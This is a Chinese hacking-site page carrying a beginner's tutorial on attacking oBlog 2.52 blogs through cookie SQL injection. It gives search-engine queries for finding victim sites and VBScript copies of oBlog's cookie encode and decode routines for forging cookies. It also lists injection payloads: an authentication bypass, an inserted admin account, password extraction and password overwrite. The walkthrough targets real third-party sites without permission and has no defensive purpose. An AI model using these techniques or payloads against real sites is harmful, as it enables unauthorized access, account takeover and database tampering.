欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

巧改COOKIE注入OBLOG 2.52

  • 软件大小:3.34 MB
  • 软件语言:简体中文
  • 软件类型:最新综合教程
  • 软件授权:免费教程
  • 更新时间:2005-08-27
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

巧改COOKIE注入OBLOG 2.52软件介绍


大家好,我是 独孤无言,第一次做教程,希望大家多多捧场.

下面开始正题,
今天要入侵的是oblog2.52
至于漏洞的原理在这就不说了,有兴趣的可以加进我QQ或到我群里讨论

首先还是看看这次入侵所要的工具吧
MyBrowser.EXE 
呵呵,就这么一个行了
现在开始找目标
到GOOGLE 或BAUDU上搜 Powered by oBlog 2.52 CopyrigHT
好了,这上面的就是我们的目标了,随便找一个吧
就它了http://www.hack58.com/  其头这个漏洞还是好广的,今天 试了好多个,80%多的都能进前台

先注册个用户,下面看我操作,都很简单的

好了,我这已经注册好了,就不浪费大家时间了,用户duguwuyan,密码123456
不好意思,刚才出了点问题,我们接着做
这里我们还要用到oblog2.52里的两个加/解密函数
看我操作
好了,分加把 CodeCookie和 DECodeCookie修改成这样
str=inputbox("")
Dim i
 Dim StrRtn
 For i = Len(Str) to 1 Step -1
  StrRtn = StrRtn & Ascw(Mid(Str,i,1))
  If (i <> 1) Then StrRtn = StrRtn & "a"
 Next
 CodeCookie = StrRtn
inputbox "","",codecookie
这个存为CODECOOKIE.VBS


str=inputbox("")
Dim i
 Dim StrArr,StrRtn
 StrArr = Split(Str,"a")
 For i = 0 to UBound(StrArr)
  If isNumeric(StrArr(i)) = True Then
   StrRtn = Chrw(StrArr(i)) & StrRtn
  Else
   StrRtn = Str
   End If
 Next
        DecodeCookie = StrRtn
inputbox "","",decodecookie
这个存为decodecookie.vbs
OK,看看能不能用
出错了,再看看

好了,主角出场,认真看哦
输入用户duguwuyan,密码123456
~~~~~~~~~~~~
输错了,再来
有点慢,大家==
进入管理中心
注意这里,55a53a48a101a54a53a101a98a98a97a57a53a97a98a57a52看我们修改它
打开刚才的CODECOOKIE.VBS输入1' or '1'=1'
得到加密码后的数据
开始注入
刷新一下

先记下这里??!!!!不明白,算了
看操作
慢..........
混,出错了,再来
嗯 ,看见了没,然在我们已经成功得到了进入了前台
好了,教程就到这了,本来还想注入后台的,可今天试了
49ba59abbe56e057' insert into admin(username,password) values('dgwy','49ba59abbe56e057')--
等数据库操作都不能成功提升后台

49ba59abbe56e057' and 1<(select userpassword from [user] where userid=1)--
49ba59abbe56e057' update [user] set userpassword='49ba59abbe56e057' where username='bjboy
也不能爆出和更改前台用户的密码,实在是想不明白是什么原因.
由于本人菜鸟一个,希望能得到高手的指点,
教我怎么样才能注入后台.非常感谢!


也欢迎大家加到我QQ 或群里讨论


  QQ:45159435~~~~~~~~~~~~~~~~~~~~~~~

  • 热门下载